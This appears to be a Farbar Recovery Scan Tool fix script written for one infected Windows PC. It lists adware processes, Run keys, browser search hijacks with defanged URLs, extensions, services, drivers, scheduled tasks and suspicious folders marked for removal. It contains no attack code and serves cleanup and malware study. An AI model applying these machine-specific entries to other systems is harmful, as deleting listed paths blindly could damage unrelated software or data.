CreateRestorePoint:
(VentureOmni Technologies) C:\Users\Pavilion\AppData\Local\JumpstThun357\VOTPrx.exe
() C:\Program Files\shopperz170220161305\Aluobo.exe
() C:\Program Files\shopperz170220161305\Fuuwiili.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\msrtn32\msrtn32.exe
(TODO: ) C:\Program Files (x86)\Note-up\Note-up.exe
(Google Inc.) C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Temp\20160203\ct.exe
() C:\Program Files (x86)\dataup\dataup.exe
(ArcadeTwist) C:\Users\Pavilion\AppData\Local\ElastiMotio68\Elaccumulate.exe
() C:\Program Files (x86)\msrtn32\cdhtr.exe
() C:\Program Files (x86)\msrtn32\rthdcpd.exe
HKLM-x32\...\Run: [msrtn32] => C:\Program Files (x86)\msrtn32\msrtn32.exe [1140736 2016-01-22] ()
HKLM-x32\...\Run: [Note-up] => C:\Program Files (x86)\Note-up\note-up.exe [6772736 2015-10-09] (TODO: )
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] ()
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [764144 2016-01-11] ()
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\...\Policies\Explorer: [NoInternetIcon] 1
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
AppInit_DLLs: C:\ProgramData\TomorrowGames\STNPM64.dll => C:\ProgramData\TomorrowGames\STNPM64.dll [1096704 2016-01-26] (TomorrowGames)
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AllPCoptimizer.exe.lnk [2016-01-24]
ShortcutTarget: AllPCoptimizer.exe.lnk -> C:\Windows\Installer\{20A647C6-0C59-42A7-B3B4-1E95674496BB}\NewShortcut1_4CA89A60165741188EC12DF8484E49A4.exe (Flexera Software LLC)
ProxyServer: [S-1-5-21-1747109027-2776113220-583691413-1000] => 127.0.0.1:18159
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1747109027-2776113220-583691413-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_07&cd=2XzuyEtN2Y1L1Qzu0CzztD0A0AzyzyyByE0DyEzyzy0C0EtCtN0D0Tzu0StCyDtDzztN1L2XzutAtFtCzztFtCtFyDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyC0Dzzzz0F0E0C0FtGyB0D0DyBtGyBtByDtCtGtA0DyDzztG0BtA0B0DyBzyyDyDtAzz0BtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0BtCyEtA0A0C0CtGtD0F0EyBtGyEtCyByCtG0BtCzz0CtGyEtA0ByDzy0A0B0A0C0DtAyB2QtN0A0LzutB&cr=211330450&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> DefaultScope {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1747109027-2776113220-583691413-1000 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQsBVVtAQAwVbV9ZVQtcFQAVdRQBUwoXDAcSdQsABFxGEgBCcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
BHO: shopperz170220161305 -> {5372DE0D-02B6-4505-883A-431BBB712096} -> C:\Program Files\shopperz170220161305\Mhnoav64.dll [2016-02-17] ()
BHO: Password Boss -> {99af1bd8-7efc-4361-aed5-8c612492a051} -> C:\WINDOWS\system32\mscoree.dll [2015-10-29] (Microsoft Corporation)
BHO-x32: shopperz170220161305 -> {5372DE0D-02B6-4505-883A-431BBB712096} -> C:\Program Files\shopperz170220161305\Mhnoav.dll [2016-02-17] ()
BHO-x32: Password Boss -> {99af1bd8-7efc-4361-aed5-8c612492a051} -> C:\WINDOWS\SysWOW64\mscoree.dll [2015-10-29] (Microsoft Corporation)
Toolbar: HKLM - Password Boss Toolbar - {2b43dc1c-e3a3-4bad-8242-6fa6302d3f34} - C:\WINDOWS\system32\mscoree.dll [2015-10-29] (Microsoft Corporation)
Toolbar: HKLM-x32 - Password Boss Toolbar - {2b43dc1c-e3a3-4bad-8242-6fa6302d3f34} - C:\WINDOWS\SysWOW64\mscoree.dll [2015-10-29] (Microsoft Corporation)
FF HKLM\...\Firefox\Extensions: [{FF8D2983-3FE2-4DB7-8182-209032C82EAD}] - C:\Program Files\shopperz260120162332\Firefox\{FF8D2983-3FE2-4DB7-8182-209032C82EAD}.xpi
FF Extension: shopperz260120162332 - C:\Program Files\shopperz260120162332\Firefox\{FF8D2983-3FE2-4DB7-8182-209032C82EAD}.xpi [2016-01-26] [not signed]
FF HKLM\...\Firefox\Extensions: [{01597E45-9F85-42DD-8FCD-2996E25BCBD6}] - C:\Program Files\groover270120160530\Firefox\{01597E45-9F85-42DD-8FCD-2996E25BCBD6}.xpi
FF Extension: groover270120160530 - C:\Program Files\groover270120160530\Firefox\{01597E45-9F85-42DD-8FCD-2996E25BCBD6}.xpi [2016-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FF8D2983-3FE2-4DB7-8182-209032C82EAD}] - C:\Program Files\shopperz260120162332\Firefox\{FF8D2983-3FE2-4DB7-8182-209032C82EAD}.xpi
FF HKLM-x32\...\Firefox\Extensions: [{01597E45-9F85-42DD-8FCD-2996E25BCBD6}] - C:\Program Files\groover270120160530\Firefox\{01597E45-9F85-42DD-8FCD-2996E25BCBD6}.xpi
CHR NewTab: Default -> "chrome-extension://ljibkigjccbegnbeojkoafejpoiachej/newtab.html","chrome-extension://jlcgehabolcakkjhgmgpkagpolbjlhfa/newtab/newtab-hp.html"
CHR Extension: (Search Module Plus v2) - C:\Users\Pavilion\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa [2016-02-25]
CHR Extension: (Palikan New Tab) - C:\Users\Pavilion\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljibkigjccbegnbeojkoafejpoiachej [2016-02-25]
R3 4A4D9D04-DA07-40F9-8670-5691287EE347; C:\Program Files\shopperz170220161305\Aluobo.exe [232808 2016-02-17] ()
R3 Dataup; C:\Program Files (x86)\dataup\dataup.exe [77824 2015-08-06] () [File not signed] <==== ATTENTION
R2 PBUpdater; C:\Program Files (x86)\PasswordBoss\PBUpdater\PBUpdater.exe [72888 2016-02-12] ()
R3 VOTPrx; C:\Users\Pavilion\AppData\Local\JumpstThun357\VOTPrx.exe [1726800 2015-08-07] (VentureOmni Technologies)
R2 windowsmanagementservice; C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Local\Temp\20160203\ct.exe [850944 2015-07-24] (Google Inc.) [File not signed]
R2 SPDRIVER_1.42.1.10633; C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10633\jsdrv.sys [53048 2016-01-17] ()
R2 VOTw8; C:\WINDOWS\system32\Drivers\VOTw864.sys [44136 2015-08-07] (VentureOmni Technologies)
S1 cherimoya; system32\drivers\cherimoya.sys [X]
C:\Program Files (x86)\ShopperPro3
2016-03-04 07:19 - 2016-03-04 07:19 - 00000000 _____ C:\WINDOWS\SysWOW64\ws.db
2016-03-04 07:08 - 2016-03-04 07:08 - 00000000 ____D C:\ProgramData\36db0c4b-56b3-0
2016-03-03 13:03 - 2016-03-03 13:03 - 00003888 _____ C:\WINDOWS\System32\Tasks\{78F050FA-630C-8830-4A0C-DB36C4C6C07E}
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\a4d5839c
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\36db0c4b-40f5-0
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\{07d02610-312c-0}
2016-03-03 13:03 - 2016-03-03 13:03 - 00000000 ____D C:\ProgramData\{0724b90a-612c-1}
2016-03-02 02:21 - 2016-03-02 02:21 - 00000000 ____D C:\WINDOWS\system32\kaio
2016-03-01 13:17 - 2016-03-01 13:17 - 00000000 ____D C:\WINDOWS\system32\hope
2016-02-26 09:05 - 2016-02-26 09:05 - 00000000 ____D C:\WINDOWS\system32\byjg
2016-02-25 20:31 - 2016-02-25 20:31 - 00000000 ____D C:\WINDOWS\system32\uke
2016-02-25 08:03 - 2016-02-25 08:03 - 00000000 ____D C:\WINDOWS\system32\hebj
2016-02-21 00:16 - 2016-02-21 00:16 - 00000000 ____D C:\WINDOWS\system32\kylq
2016-02-20 21:37 - 2016-02-20 21:37 - 00000000 ____D C:\WINDOWS\system32\mabj
2016-02-18 13:08 - 2016-02-18 13:08 - 00000000 ____D C:\WINDOWS\system32\cao
2016-02-17 13:33 - 2016-02-17 13:37 - 00000000 ____D C:\ProgramData\PasswordBoss
2016-02-17 13:33 - 2016-02-17 13:33 - 00003418 _____ C:\WINDOWS\System32\Tasks\ProfessionalCleaningSoftware_Start
2016-02-17 13:33 - 2016-02-17 13:33 - 00003336 _____ C:\WINDOWS\System32\Tasks\PasswordBoss_Desktop
2016-02-17 13:33 - 2016-02-17 13:33 - 00001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Password Boss.lnk
2016-02-17 13:33 - 2016-02-17 13:33 - 00001124 _____ C:\Users\Public\Desktop\Password Boss.lnk
2016-02-17 13:33 - 2016-02-17 13:33 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\updates
2016-02-17 13:33 - 2016-02-17 13:33 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Professional_Cleaning_Sof
2016-02-17 13:33 - 2016-02-17 13:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PasswordBoss
2016-02-17 13:32 - 2016-03-04 20:32 - 00000306 _____ C:\WINDOWS\Tasks\Go_Palikan.job
2016-02-17 13:32 - 2016-03-03 07:32 - 00000000 ____D C:\Users\Pavilion\AppData\Local\{745E4202-50F6-2EBA-3D6E-0B521906F7CA}
2016-02-17 13:32 - 2016-02-17 13:33 - 00000000 ____D C:\Program Files (x86)\PasswordBoss
2016-02-17 13:32 - 2016-02-17 13:32 - 00002790 _____ C:\WINDOWS\System32\Tasks\Go_Palikan
2016-02-17 13:32 - 2016-02-17 13:32 - 00000000 ____D C:\ProgramData\InstallMate
2016-02-17 13:31 - 2016-02-17 13:31 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner
2016-02-17 03:55 - 2016-02-17 03:55 - 00000000 ____D C:\WINDOWS\system32\eiko
2016-02-17 03:26 - 2016-03-03 07:50 - 00000000 ____D C:\Program Files\shopperz170220161305
2016-02-17 03:26 - 2016-03-02 22:56 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\ToqtudDoabje
2016-02-17 03:26 - 2016-02-17 03:26 - 00003424 _____ C:\WINDOWS\System32\Tasks\Ruoijfij
2016-02-17 03:26 - 2016-02-17 03:26 - 00000150 _____ C:\Users\Pavilion\Desktop\FTM+.url
2016-02-17 03:26 - 2016-02-17 03:26 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Shortcut Installer
2016-02-17 03:24 - 2016-02-17 03:24 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sound+ 1.0
2016-02-17 03:23 - 2016-02-17 03:23 - 00001124 _____ C:\Users\Pavilion\Desktop\VirusDefense.lnk
2016-02-17 03:23 - 2016-02-17 03:23 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirusDefense
2016-02-17 03:23 - 2016-02-17 03:23 - 00000000 ____D C:\Program Files (x86)\VirusDefense
2016-02-17 03:13 - 2016-03-03 07:45 - 00000000 ____D C:\Users\Pavilion\AppData\Local\30464E43-1455678818-4B31-385A-C80AA9974D49
2016-02-17 03:11 - 2016-03-03 07:51 - 00000000 ____D C:\Program Files (x86)\30464E43-1455707515-4B31-385A-C80AA9974D49
2016-02-17 01:34 - 2016-02-17 01:34 - 00011264 _____ () C:\WINDOWS\errr.exe
2016-02-14 02:32 - 2016-02-14 02:32 - 00000000 ____D C:\WINDOWS\system32\dyk
2016-02-12 19:34 - 2016-02-12 19:34 - 00003919 _____ C:\WINDOWS\ab.bat
2016-02-11 16:10 - 2016-02-11 16:10 - 00000000 ____D C:\WINDOWS\system32\yul
2016-02-10 21:23 - 2016-02-10 21:23 - 00000000 ____D C:\WINDOWS\system32\tecb
2016-02-10 18:54 - 2016-02-10 18:54 - 00000000 ____D C:\WINDOWS\system32\sabm
2016-02-10 15:49 - 2016-02-10 15:49 - 00000000 ____D C:\WINDOWS\system32\katn
2016-02-10 08:53 - 2016-02-10 08:53 - 00000000 ____D C:\WINDOWS\system32\dos
2016-02-09 23:58 - 2016-02-09 23:58 - 00000000 ____D C:\WINDOWS\system32\ooom
2016-02-09 17:08 - 2016-02-09 17:08 - 00000000 ____D C:\WINDOWS\system32\fil
2016-02-09 07:52 - 2016-02-09 07:52 - 00000000 ____D C:\WINDOWS\system32\coe
2016-02-09 01:33 - 2016-02-09 01:33 - 00000000 ____D C:\WINDOWS\system32\vywi
2016-02-08 05:02 - 2016-02-08 05:02 - 00000000 ____D C:\WINDOWS\system32\buo
2016-02-08 01:54 - 2016-02-08 01:54 - 00000000 ____D C:\WINDOWS\system32\ieu
2016-02-07 11:59 - 2016-02-07 11:59 - 00000000 ____D C:\WINDOWS\system32\eih
2016-02-06 17:48 - 2016-02-06 17:48 - 00000000 ____D C:\WINDOWS\system32\lang
2016-02-06 14:15 - 2016-02-06 14:15 - 00000000 ____D C:\WINDOWS\system32\robo
2016-02-06 13:16 - 2016-02-06 13:16 - 00000000 ____D C:\WINDOWS\system32\faw
2016-02-06 11:21 - 2016-02-06 11:21 - 00000000 ____D C:\WINDOWS\system32\nir
2016-02-06 05:49 - 2016-02-06 05:49 - 00000000 ____D C:\WINDOWS\system32\nen
2016-02-05 21:56 - 2016-02-05 21:56 - 00000000 ____D C:\WINDOWS\system32\lodb
2016-02-04 07:36 - 2016-02-04 07:36 - 00000000 ____D C:\WINDOWS\system32\higs
2016-02-03 14:36 - 2016-03-03 07:54 - 00003832 _____ C:\WINDOWS\System32\Tasks\DriverRestore_ScheduledScan
2016-02-03 14:36 - 2016-03-03 07:54 - 00003674 _____ C:\WINDOWS\System32\Tasks\DriverRestore_DailyScan
2016-02-03 14:30 - 2016-03-03 07:58 - 00000000 ____D C:\Program Files (x86)\DriverRestore
2016-02-03 14:30 - 2016-02-03 14:31 - 00001136 _____ C:\Users\Public\Desktop\DriverRestore.lnk
2016-02-03 14:30 - 2016-02-03 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore
2016-02-03 14:30 - 2015-10-09 02:04 - 00020872 _____ (Phoenix Technologies) C:\WINDOWS\SysWOW64\Drivers\DrvAgent64.SYS
2016-02-03 14:29 - 2016-02-03 14:29 - 00000000 ____D C:\WINDOWS\system32\cibh
2016-02-02 19:41 - 2016-03-04 20:20 - 00000302 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-02-02 19:41 - 2016-02-25 07:03 - 00000302 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-02-02 19:41 - 2016-02-02 19:41 - 00002932 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-02-02 19:41 - 2016-02-02 19:41 - 00002638 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-02-02 19:40 - 2016-03-03 07:53 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-02-02 19:40 - 2016-02-02 19:46 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\System Healer
2016-02-02 19:40 - 2016-02-02 19:40 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-02-02 19:40 - 2016-02-02 19:40 - 00003428 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2016-02-02 19:40 - 2016-02-02 19:40 - 00003358 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-02-02 19:40 - 2016-02-02 19:40 - 00001124 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-02-02 19:40 - 2016-02-02 19:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-02-02 19:39 - 2016-02-03 18:15 - 00000000 ____D C:\Users\Pavilion\AppData\Local\NowUSeeItPlayer
2016-02-02 19:39 - 2016-02-02 19:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player
2016-02-02 19:39 - 2016-02-02 19:39 - 00000000 ____D C:\Program Files (x86)\NowUSeeItPlayer
2016-02-02 19:38 - 2016-03-04 21:24 - 00000300 _____ C:\WINDOWS\Tasks\JumpstaOf815.job
2016-02-02 19:38 - 2016-03-04 20:49 - 00000300 _____ C:\WINDOWS\Tasks\PanoramiShoc77.job
2016-02-02 19:38 - 2016-03-04 20:24 - 00010712 _____ C:\WINDOWS\SysWOW64\VOTPrxOff.ini
2016-02-02 19:38 - 2016-03-04 20:24 - 00010712 _____ C:\WINDOWS\system32\VOTPrxOff.ini
2016-02-02 19:38 - 2016-02-02 19:38 - 00003218 _____ C:\WINDOWS\System32\Tasks\PanoramiShoc77
2016-02-02 19:38 - 2016-02-02 19:38 - 00003214 _____ C:\WINDOWS\System32\Tasks\JumpstaOf815
2016-02-02 19:38 - 2016-02-02 19:38 - 00000000 ____D C:\Users\Pavilion\AppData\Local\JumpstThun357
2016-02-02 19:38 - 2016-02-02 19:38 - 00000000 ____D C:\Users\Pavilion\AppData\Local\ElastiMotio68
2016-02-02 19:38 - 2015-08-07 15:01 - 00044136 _____ (VentureOmni Technologies) C:\WINDOWS\system32\Drivers\VOTw864.sys
2016-02-02 19:36 - 2016-03-03 07:53 - 00000000 ____D C:\Program Files (x86)\Search Web Know
2016-02-02 19:36 - 2016-03-02 22:56 - 00000000 ____D C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178
2016-02-02 19:35 - 2016-03-02 22:17 - 00000000 ____D C:\Users\Pavilion\AppData\Local\UpdateAdmin
2016-02-02 19:35 - 2016-02-02 19:35 - 00003918 _____ C:\WINDOWS\System32\Tasks\UpdateAdmin
2016-02-02 19:35 - 2016-02-02 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin
2016-01-30 04:56 - 2016-01-30 04:56 - 00000000 ____D C:\WINDOWS\system32\opac
2016-01-29 18:34 - 2016-01-29 18:34 - 00000000 ____D C:\WINDOWS\system32\owa
2016-01-29 09:14 - 2016-01-29 09:14 - 00000000 ____D C:\WINDOWS\system32\lurb
2016-01-29 08:11 - 2016-01-29 08:11 - 00000000 ____D C:\WINDOWS\system32\foh
2016-01-28 10:00 - 2016-01-28 10:00 - 00000000 ____D C:\WINDOWS\system32\bolp
2016-01-28 00:13 - 2016-01-28 00:13 - 00001128 _____ C:\Users\Pavilion\Desktop\Weather Wizard.lnk
2016-01-28 00:13 - 2016-01-28 00:13 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Weather Wizard
2016-01-28 00:13 - 2016-01-28 00:13 - 00000000 ____D C:\Program Files (x86)\Weather Wizard
2016-01-28 00:05 - 2016-03-04 21:10 - 00000440 ____H C:\WINDOWS\Tasks\GFWRCXRFILHBOWQG.job
2016-01-28 00:05 - 2016-03-04 20:20 - 00000384 _____ C:\WINDOWS\Tasks\OPJRVQSN1.job
2016-01-28 00:05 - 2016-03-03 07:45 - 00000000 ____D C:\ProgramData\TomorrowGames
2016-01-28 00:05 - 2016-03-03 07:45 - 00000000 ____D C:\ProgramData\Service1104
2016-01-28 00:05 - 2016-01-28 00:05 - 00003454 _____ C:\WINDOWS\System32\Tasks\GFWRCXRFILHBOWQG
2016-01-28 00:05 - 2016-01-28 00:05 - 00002952 _____ C:\WINDOWS\System32\Tasks\OPJRVQSN1
2016-01-28 00:05 - 2016-01-28 00:05 - 00001922 _____ C:\Users\Public\Desktop\Play Games.lnk
2016-01-28 00:05 - 2016-01-28 00:05 - 00000000 ____D C:\ProgramData\19a87fa1ec024bbcbb41931263354405
2016-01-27 23:42 - 2016-01-27 23:43 - 00000000 ____D C:\Program Files (x86)\msrtn32
2016-01-27 23:28 - 2016-01-27 23:28 - 00000000 ____D C:\WINDOWS\system32\paif
2016-01-27 15:54 - 2016-01-27 15:54 - 00000000 ____D C:\WINDOWS\system32\wha
2016-01-27 08:42 - 2016-01-27 08:42 - 00000000 ____D C:\WINDOWS\system32\goc
2016-01-26 23:38 - 2016-01-26 23:38 - 00001341 _____ C:\Users\Public\Desktop\Solid YouTube Downloader and Converter.lnk
2016-01-26 23:38 - 2016-01-26 23:38 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\youtube-downloader-and-converter
2016-01-26 23:38 - 2016-01-26 23:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Solid YouTube Downloader and Converter
2016-01-26 23:38 - 2016-01-26 23:38 - 00000000 ____D C:\Program Files (x86)\Solid YouTube Downloader and Converter
2016-01-26 22:10 - 2016-03-03 07:45 - 00000000 ____D C:\Users\Pavilion\AppData\Local\21299
2016-01-26 21:59 - 2016-03-03 07:46 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Birds365
2016-01-26 21:59 - 2016-03-03 07:46 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Birds
2016-01-26 21:53 - 2016-03-03 07:50 - 00000000 ____D C:\Program Files\groover270120160530
2016-01-26 21:53 - 2016-01-26 21:53 - 00003422 _____ C:\WINDOWS\System32\Tasks\Hicpadf
2016-01-26 21:50 - 2016-03-02 22:56 - 00000000 ____D C:\Users\Pavilion\AppData\Local\SearchModule
2016-01-26 21:50 - 2016-03-02 22:48 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\BejmaDua
2016-01-26 21:50 - 2016-02-17 03:26 - 00000000 ____D C:\Users\Pavilion\AppData\Local\Tempfolder
2016-01-26 21:50 - 2016-01-26 21:50 - 00003534 _____ C:\WINDOWS\System32\Tasks\SMWUpd
2016-01-26 21:50 - 2016-01-26 21:50 - 00003506 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-26 21:47 - 2016-03-03 07:51 - 00000000 ____D C:\Program Files\shopperz260120162332
2016-01-26 21:47 - 2016-01-26 21:47 - 00003422 _____ C:\WINDOWS\System32\Tasks\Ioagapi
2016-01-26 21:47 - 2016-01-26 21:47 - 00000000 ____D C:\Users\Pavilion\AppData\LocalLow\Company
2016-01-26 21:47 - 2016-01-26 21:47 - 00000000 ____D C:\Users\Pavilion\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-26 21:47 - 2016-01-26 21:47 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-26 07:29 - 2016-03-04 20:21 - 00000000 ____D C:\Users\Pavilion\AppData\Local\mstrn32
2016-01-26 07:29 - 2016-03-03 07:37 - 00000000 ____D C:\Program Files (x86)\cpx
2016-01-26 07:29 - 2016-01-26 07:29 - 00000000 ____D C:\Users\Pavilion\AppData\Local\cpx
2016-01-24 20:43 - 2016-03-03 07:48 - 00000000 __SHD C:\Users\Pavilion\AppData\Local\winone
2016-01-24 20:43 - 2016-01-24 20:43 - 00000000 ___HD C:\Users\Pavilion\AppData\Local\SatakMalwareBusterSetup
2016-01-24 20:43 - 2016-01-24 20:43 - 00000000 ___HD C:\Users\Pavilion\AppData\Local\One10_PC_CleanerUn
2016-01-24 20:43 - 2016-01-24 20:43 - 00000000 ____D C:\Users\Pavilion\AppData\Local\One10_PC_Cleaner
2016-01-24 20:42 - 2016-01-24 20:42 - 00000000 ____D C:\Users\Pavilion\AppData\Local\TVTime
2016-01-24 20:41 - 2016-02-04 07:39 - 00000000 ____D C:\ProgramData\DataFile
2016-01-24 20:41 - 2016-01-27 08:41 - 00000000 ____D C:\Users\Pavilion\AppData\Local\bvxvbxxvaa
2016-01-24 20:41 - 2016-01-27 08:41 - 00000000 ____D C:\ProgramData\LrwHplZXAyh
2016-01-24 20:41 - 2016-01-24 20:42 - 00003554 _____ C:\WINDOWS\System32\Tasks\bvxvbxxvaa
2016-01-24 20:41 - 2016-01-24 20:41 - 00002631 _____ C:\Users\Public\Desktop\AllPCOptimizer.exe.lnk
2016-01-24 20:41 - 2016-01-24 20:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\All PC Optimizer
2016-01-24 20:41 - 2016-01-24 20:41 - 00000000 ____D C:\Program Files (x86)\AllPCOptimizer
2016-01-24 20:39 - 2016-03-04 20:44 - 00000372 ____H C:\WINDOWS\Tasks\YPAYFOUHKEKEJOJX.job
2016-01-24 20:39 - 2016-03-02 22:58 - 00000000 ____D C:\ProgramData\Service1291
2016-01-24 20:39 - 2016-01-24 20:39 - 00003454 _____ C:\WINDOWS\System32\Tasks\YPAYFOUHKEKEJOJX
2016-01-24 20:39 - 2016-01-24 20:39 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-24 20:32 - 2016-03-03 13:04 - 00000000 ____D C:\ProgramData\a24e8dd4-1935-0
2016-01-24 20:32 - 2016-03-03 13:04 - 00000000 ____D C:\ProgramData\a24e8dd4-0e61-1
2016-01-24 20:32 - 2016-03-03 07:53 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-24 20:32 - 2016-03-03 07:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-24 20:32 - 2016-02-25 07:02 - 00000306 _____ C:\WINDOWS\Tasks\One System CarePeriod.job
2016-01-24 20:32 - 2016-01-24 20:37 - 00000000 ____D C:\Users\Pavilion\AppData\Roaming\One System Care
2016-01-24 20:32 - 2016-01-24 20:32 - 00003692 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-01-24 20:32 - 2016-01-24 20:32 - 00003438 _____ C:\WINDOWS\System32\Tasks\One System Care Run Delay
2016-01-24 20:32 - 2016-01-24 20:32 - 00003368 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-01-24 20:32 - 2016-01-24 20:32 - 00002940 _____ C:\WINDOWS\System32\Tasks\One System CarePeriod
2016-01-24 20:32 - 2016-01-24 20:32 - 00001136 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-01-24 20:31 - 2016-03-03 07:45 - 00000000 ____D C:\Users\Pavilion\AppData\Local\30464E43-1453667467-4B31-385A-C80AA9974D49
2016-01-24 20:31 - 2016-01-24 20:31 - 00023280 _____ C:\WINDOWS\System32\Tasks\{7E0C0947-797E-0F09-0911-780A780E117A}
2016-01-24 20:31 - 2016-01-24 20:31 - 00000000 ____D C:\ProgramData\f3b6a8f4-3dc7-0
2016-01-24 20:31 - 2016-01-24 20:31 - 00000000 ____D C:\ProgramData\f3b6a8f4-3287-1
2016-01-24 20:30 - 2016-01-24 20:30 - 00000000 ____D C:\Program Files (x86)\30464E43-1453696244-4B31-385A-C80AA9974D49
2016-01-24 20:30 - 2016-01-24 20:29 - 00001110 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
